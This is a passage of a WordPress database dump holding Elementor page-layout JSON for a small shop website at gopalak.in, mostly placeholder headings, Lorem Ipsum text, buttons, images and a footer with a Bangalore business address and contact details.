Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7fab8ef\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"stretch_section\":\"section-stretched\",\"structure\":\"22\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\",\"id\":1355,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-55,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"235\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"728be13\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":92.108999999999995},\"elements\":[{\"id\":\"0ea21e0\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Saira Stencil One\",\"typography_font_size\":{\"unit\":\"px\",\"size\":22,\"sizes\":[]},\"typography_font_weight\":\"100\",\"text_stroke_text_stroke_type\":\"yes\",\"text_stroke_text_stroke\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"text_stroke_stroke_color\":\"#FFFFFF\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"color\":\"rgba(68.25, 44.95597826086957, 44.95597826086957, 0.3)\"},\"_margin\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"122\",\"bottom\":\"0\",\"left\":\"423\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e9c7fcf\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"04a298f\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"30d54b3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#0303037A\",\"margin\":{\"unit\":\"px\",\"top\":\"37\",\"right\":\"0\",\"bottom\":\"-25\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"27\",\"right\":\"1\",\"bottom\":\"42\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cce3d9f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"924390d\",\"elType\":\"widget\",\"settings\":{\"text_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"0e2e48f\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#FF8800\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"712d983\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":true}],\"isInner\":true},{\"id\":\"21726cb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"3\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98f9256\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":7.1929999999999996},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5b7eb71\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":664,\"sizes\":[]},\"structure\":\"30\",\"margin\":{\"unit\":\"px\",\"top\":\"-62\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"3e91b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#477D50\",\"background_color_b\":\"#A7D6AD\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"1976daf\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"2a854a8\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#134019\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"407c3fc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#477D50\",\"background_color_b\":\"#A7D6AD\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"1473cd0\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"5c71249\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#1B4121\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"caccabd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#477D50\",\"background_color_b\":\"#A7D6AD\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"7382c00\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"7ce177e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#203E24\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f78ed1a\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"39b0f4e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e9c825a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":125,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"62f5f76\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\"},\"elements\":[{\"id\":\"a2fa7af\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ac4e1ad\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"caa5378\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"39999ab\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lorem Ipsum<\\/strong>\\u00a0is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.<\\/p>\",\"align\":\"center\",\"text_color\":\"#174725\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"eaa49a3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Know More\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c3a23a2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"22d1461\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"750\",\"left\":\"100\",\"isLinked\":false}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"acb2826\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\",\"margin\":{\"unit\":\"px\",\"top\":\"-458\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"84a32d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"89a82b4\",\"elType\":\"widget\",\"settings\":{\"title\":\"LATEST NEWS\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36bc667\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":740,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"bb02c40\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"0769ef1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"75ce5f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f527d10\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"7899f3f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8274f01\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0f6b27e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70a66d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"ae8a1a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"fd8def6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"91ca2f8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a36dcd9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"125f124\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"508fa7c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4ddf161\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36cae65\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"152\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\\nContact : (+91)7259272171<br>\\nE-mail id: mango@homedirect.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(8181,1444,'_elementor_page_assets','a:0:{}'),(8183,1445,'_elementor_edit_mode','builder'),(8184,1445,'_elementor_template_type','wp-page'),(8185,1445,'_elementor_version','3.7.7'),(8186,1445,'_wp_page_template','elementor_canvas'),(8187,1445,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"50\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":58.631999999999998},\"elements\":[],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":5.2939999999999996},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":3.1619999999999999},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":12.894},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7fab8ef\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"stretch_section\":\"section-stretched\",\"structure\":\"22\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\",\"id\":1355,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-55,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"224\",\"left\":\"0\",\"isLinked\":false},\"margin\":{\"unit\":\"px\",\"top\":\"-14\",\"right\":0,\"bottom\":\"-14\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"728be13\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":92.108999999999995},\"elements\":[{\"id\":\"0ea21e0\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Saira Stencil One\",\"typography_font_size\":{\"unit\":\"px\",\"size\":22,\"sizes\":[]},\"typography_font_weight\":\"100\",\"text_stroke_text_stroke_type\":\"yes\",\"text_stroke_text_stroke\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"text_stroke_stroke_color\":\"#FFFFFF\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"color\":\"rgba(68.25, 44.95597826086957, 44.95597826086957, 0.3)\"},\"_margin\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"122\",\"bottom\":\"0\",\"left\":\"423\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e9c7fcf\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"04a298f\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"30d54b3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#0303037A\",\"margin\":{\"unit\":\"px\",\"top\":\"37\",\"right\":\"0\",\"bottom\":\"-25\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"27\",\"right\":\"1\",\"bottom\":\"42\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cce3d9f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"924390d\",\"elType\":\"widget\",\"settings\":{\"text_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"0e2e48f\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#FF8800\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"712d983\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":true}],\"isInner\":true},{\"id\":\"21726cb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"3\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98f9256\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":7.1929999999999996},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"f78ed1a\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"39b0f4e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e9c825a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":125,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"62f5f76\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\"},\"elements\":[{\"id\":\"a2fa7af\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ac4e1ad\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"caa5378\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"39999ab\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lorem Ipsum<\\/strong>\\u00a0is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.<\\/p>\",\"align\":\"center\",\"text_color\":\"#174725\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"eaa49a3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Know More\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c3a23a2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"22d1461\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"750\",\"left\":\"100\",\"isLinked\":false}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"acb2826\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\",\"margin\":{\"unit\":\"px\",\"top\":\"-458\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"84a32d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"89a82b4\",\"elType\":\"widget\",\"settings\":{\"title\":\"LATEST NEWS\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36bc667\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":740,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"bb02c40\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"0769ef1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"75ce5f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f527d10\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"7899f3f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8274f01\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0f6b27e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70a66d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"ae8a1a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"fd8def6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"91ca2f8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a36dcd9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"125f124\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"508fa7c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4ddf161\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36cae65\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click 